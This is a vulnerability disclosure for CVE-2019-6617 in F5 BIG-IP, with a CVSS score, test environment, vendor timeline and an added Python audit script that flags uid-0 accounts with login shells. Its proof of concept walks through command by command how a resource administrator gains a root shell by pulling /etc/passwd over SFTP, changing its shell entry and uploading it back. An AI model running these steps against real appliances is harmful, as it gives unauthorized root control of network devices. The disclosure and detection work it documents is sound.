security-research/vulnerabilities/F5/CVE-2019-6617.txt
Title: F5 BIG-IP Resource Administrator Privilege Escalation
Author: Rich Mirch
CVE: CVE-2019-6617
Vendor Advisory: https://support.f5.com/csp/article/K38941195

Description

An F5 BIG-IP account with the resource administrator role, while also having
terminal access disabled, still has the ability to access the appliance via
SFTP as root. This PoC will show that a resource administrator can obtain root
access to the appliance and take full control with terminal access disabled.

Technical details

A local account configured with the resource administrator role is created as
a Linux user with uid set to zero/root. SSH is not allowed when terminal
access is disabled. The problem is that the SFTP service is still allowed
without any restrictions. Since a resource administrator account is a Linux
root account, it has the ability to overwrite any file on the system.

Note: The SSH service must be enabled and the management interface accessible.

CVSS

Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Base: 7.2
Temporal: 6.9
Test Environment

F5 BIG-IP Virtual Edition 14.0.0.1

[root@bigip14:Active:Standalone] ~ # tmsh show sys version
Sys::Version
Main Package
  Product  BIG-IP
  Version  14.0.0.1
  Build    0.0.2
  Edition  Point Release 1
  Date     Fri Aug 17 16:22:25 PDT 2018

A resource administrator account (resadmin) with the following attributes was used for this PoC.
Note that the shell attribute is set to "none".

[root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password
auth user resadmin {
    description resadmin
    partition Common
    partition-access {
        all-partitions {
            role resource-admin
        }
    }
    shell none
}
Proof Of Concept

[Step 1]
Show that resadmin is not allowed to SSH.

$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4
This account is currently not available.
Connection to 5.6.7.8 closed.

[Step 2]
Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file.

$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> get /etc/passwd
Fetching /etc/passwd to passwd
/etc/passwd                                   100% 1423   229.8KB/s   00:00
sftp> quit

[Step 3]
Update the local passwd file and change /sbin/nologin to /bin/bash for the resadmin user.

$ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd

[Step 4]
Display a diff of the passwd change from step 3.

$ diff -u passwd.orig passwd
--- passwd.orig 2018-09-13 17:32:55.000000000 -0500
+++ passwd 2018-09-13 17:34:36.000000000 -0500
@@ -26,4 +26,4 @@
 hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
 syscheck:x:199:10::/:/sbin/nologin
 restnoded:x:198:198::/:/sbin/nologin
-resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
+resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash

[Step 5]
SFTP as resadmin and upload the modified passwd file to /etc/passwd.

$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> cd /etc
sftp> put passwd
Uploading passwd to /etc/passwd
passwd                                        100% 1419   541.3KB/s   00:00
sftp> quit

[Step 6]
Login as resadmin via SSH and obtain a bash shell running as the root user.

$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4
[resadmin@bigip14:Active:Standalone] ~ # echo $SHELL
/bin/bash
[resadmin@bigip14:Active:Standalone] ~ # id
uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
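A defender-side check for the condition the PoC produces, added here as an example and not part of the original advisory: it parses an /etc/passwd listing (pulled from the appliance or from a UCS/backup copy) and reports every uid-0 account other than root, marking as critical any that has an interactive login shell, which is exactly what the step-4 diff creates. The sample passwd content below is constructed to mirror that diff; the root line is assumed.

```python
# Added example (not from the advisory): audit an /etc/passwd listing for uid-0
# accounts with an interactive shell, the state the PoC's tampered file produces.

# Shells that deny interactive login; anything else counts as interactive.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Return (name, uid, gid, home, shell) tuples; raise on malformed records."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # A broken record is itself suspicious after an unexpected upload.
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append((name, int(uid), int(gid), home, shell))
    return entries


def audit_uid0(text):
    """Return [(name, shell, severity)] for every uid-0 account other than root."""
    findings = []
    for name, uid, _gid, _home, shell in parse_passwd(text):
        if uid != 0 or name == "root":
            continue
        # uid 0 with no login shell is how BIG-IP provisions resource admins;
        # uid 0 with a real shell means the nologin control has been bypassed.
        severity = "info" if shell in NOLOGIN_SHELLS else "critical"
        findings.append((name, shell, severity))
    return findings


# Constructed sample mirroring the step-4 diff, before and after tampering.
PASSWD_BEFORE = """root:x:0:0:root:/root:/bin/bash
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
"""
PASSWD_AFTER = PASSWD_BEFORE.replace("/home/resadmin:/sbin/nologin", "/home/resadmin:/bin/bash")

if __name__ == "__main__":
    for label, text in (("before", PASSWD_BEFORE), ("after", PASSWD_AFTER)):
        for name, shell, severity in audit_uid0(text):
            print(f"{label}: {severity.upper()} uid-0 account {name} with shell {shell}")
```

Run it against the live /etc/passwd, or feed it the file from a scheduled UCS backup, to catch a resource-admin account whose shell no longer matches the "shell none" attribute shown under Test Environment.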
Timeline:

2018-09-13: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-09-26: Vendor requested embargo
2018-12-07: Contacted vendor for update
2019-04-30: Vendor released fix and advisory